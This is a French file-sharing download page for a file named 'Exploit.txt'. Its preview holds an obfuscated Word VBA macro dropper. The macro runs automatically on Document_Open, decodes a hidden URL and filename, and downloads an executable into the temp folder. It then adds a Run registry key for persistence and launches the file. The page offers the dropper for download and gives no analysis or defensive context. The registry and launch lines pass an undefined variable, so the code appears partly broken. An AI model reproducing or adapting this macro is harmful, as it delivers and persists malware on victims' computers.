Exploit.txt
À propos du fichier
- Type de fichier
- Fichier TXT de 3 Ko (text/plain)
- Confidentialité
- Fichier public, envoyé le 16 juillet 2015 à 22:26, depuis l'adresse IP 149.88.x.x (IL)
- Sécurité
- Ne contient aucun Virus ou Malware connus - Dernière vérification: 3 jours
- Statistiques
- La présente page de téléchargement a été vue 1011 fois depuis l'envoi du fichier
- Page de téléchargement
-
Aperçu du fichier
'Macro Name: zROlUgmitKLhisPwZpVdvDtYTUSXJCJnOzPTWNnP
Private Declare PtrSafe Function pbCYXzhykoOpAuMJgCbSObr Lib "shell32.dll" Alias "ShellExecuteA" (ByVal giCfkxudqPPrAMoInLeDepjBk As Long, ByVal HrBHDPgvCENlgJLsyRZOuqqCHszGWyxNDFxWzecKyTJAOYHH As String, ByVal uuVerSmRqHTHFzROlUgmitKLhisPwZpVdvDtY As String, ByVal TUSXJCJnOzPTWNnPvfbPkZQfpXXKxXuHVDUGKkYVPifBX As String, ByVal wCyJNcxyIRMqGYtMGwcllj As String, ByVal oZSZEQQgknfDSLvdgAdhv As Long) As Long
Private Declare PtrSafe Function kjzpskImQOwlFwmAKttghHQdFYDcuGurlDAXHRXT Lib "urlmon" Alias "URLDownloadToFileA" (ByVal gwxSUeBjMcIOiqgLGGFKvo As Long, ByVal vZAmCFIAYChQMBVMDQbJJxjK As String, ByVal htHpGswWKHCTRoJiokwzNkluEzdsKfysiNWXVbLELqDCS As String, ByVal VYQqExiPRmOThrMZNzbxwXFWIMnNYSliEZzrnyPf As Long, ByVal AoxUPtvcvBJyenomrOUcGTSjnphGVNy As Long) As Long
Dim KjdGIpJOWMsBBAEcjqUhhxADvTjc As String, LtwQtxLIrEeeFNZCVBZrQrCwOyUEPURduIQRbzuWYFLfndID As String, ECHszGWyxNDFxWzecKyTJAOYHHuuVerSmRqHTHF As String, vfbPkZQfpXXKxXuHVDUGKkYVPifBXwCyJNc As String, xyIRMqGYtMGwclljoZSZEQQgknfDSLv As String, dgAdhvFbobNpKJmTlWbAbmgyvSoME As String, ZEQQgknfDSLvdgAdhvFbo As String, bNpKJmTlWbAbmgyvSoMEBMesNBKjdGIpJOWMsBBAEcj As String
Private Function BMesNBKjdGIpJOWMsBBAEcjqUhhxADvTjcLtwQtx(LIrEeeFNZCVBZrQrCwOyUEPURduIQRbzuWYFLf)
Dim ndIDECHszGWyxNDFxWzec, KyTJAOYHHuuVerSmRqHTHFzROlUgmitKLhisPwZpVdvDtYTU, SXJCJnOzPTWNnPvfbPkZQfpXXKxXuHVDUGKkYVPifBXw
y = Len(LIrEeeFNZCVBZrQrCwOyUEPURduIQRbzuWYFLf)
For x = y To 1 Step -1
qUhhxADvTjcLtwQtxLIrEeeFNZCVBZrQrCwOyUEPURd = Mid(LIrEeeFNZCVBZrQrCwOyUEPURduIQRbzuWYFLf, x, 1)
uIQRbzuWYFLfndIDECHszGWyxNDFxWzecKyTJAOYHHu = uIQRbzuWYFLfndIDECHszGWyxNDFxWzecKyTJAOYHHu & qUhhxADvTjcLtwQtxLIrEeeFNZCVBZrQrCwOyUEPURd
Next
For KyTJAOYHHuuVerSmRqHTHFzROlUgmitKLhisPwZpVdvDtYTU = 1 To Len(uIQRbzuWYFLfndIDECHszGWyxNDFxWzecKyTJAOYHHu)
ndIDECHszGWyxNDFxWzec = Mid(uIQRbzuWYFLfndIDECHszGWyxNDFxWzecKyTJAOYHHu, KyTJAOYHHuuVerSmRqHTHFzROlUgmitKLhisPwZpVdvDtYTU, 1)
SXJCJnOzPTWNnPvfbPkZQfpXXKxXuHVDUGKkYVPifBXw = SXJCJnOzPTWNnPvfbPkZQfpXXKxXuHVDUGKkYVPifBXw & Chr(Asc(ndIDECHszGWyxNDFxWzec) - 1)
Next
BMesNBKjdGIpJOWMsBBAEcjqUhhxADvTjcLtwQtx = SXJCJnOzPTWNnPvfbPkZQfpXXKxXuHVDUGKkYVPifBXw
End Function
Private Sub zROlUgmitKLhisPwZpVdvDtYTUSXJCJnOzPTWNnP()
LtwQtxLIrEeeFNZCVBZrQrCwOyUEPURduIQRbzuWYFLfndID = BMesNBKjdGIpJOWMsBBAEcjqUhhxADvTjcLtwQtx("fyf/jw")
ECHszGWyxNDFxWzecKyTJAOYHHuuVerSmRqHTHF = Environ$("tmp") & "\" & LtwQtxLIrEeeFNZCVBZrQrCwOyUEPURduIQRbzuWYFLfndID
KjdGIpJOWMsBBAEcjqUhhxADvTjc = BMesNBKjdGIpJOWMsBBAEcjqUhhxADvTjcLtwQtx("fyf/fjqpD13&.13&ljjlp017e16decdee5g1:ed5fd:f:b151e4945ge21435909Uk8L8g680ebpmoxpe0ufo/utpihs00;quui")
kjzpskImQOwlFwmAKttghHQdFYDcuGurlDAXHRXT 0, KjdGIpJOWMsBBAEcjqUhhxADvTjc, ECHszGWyxNDFxWzecKyTJAOYHHuuVerSmRqHTHF, 0, 0
Dim Reg As Object
Set Reg = CreateObject("Wscript.shell")
Reg.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & "vi.exe", b
pbCYXzhykoOpAuMJgCbSObr 0, "open", b, "", vbNullString, vbNormalFocus
End Sub
Private Sub Document_Open()
Dim MyText As String
MyText = "bojouhf"
Selection.TypeText (MyText)
zROlUgmitKLhisPwZpVdvDtYTUSXJCJnOzPTWNnP
End Sub
Partager le fichier Exploit.txt sur le Web et les réseaux sociaux:
Télécharger le fichier Exploit.txt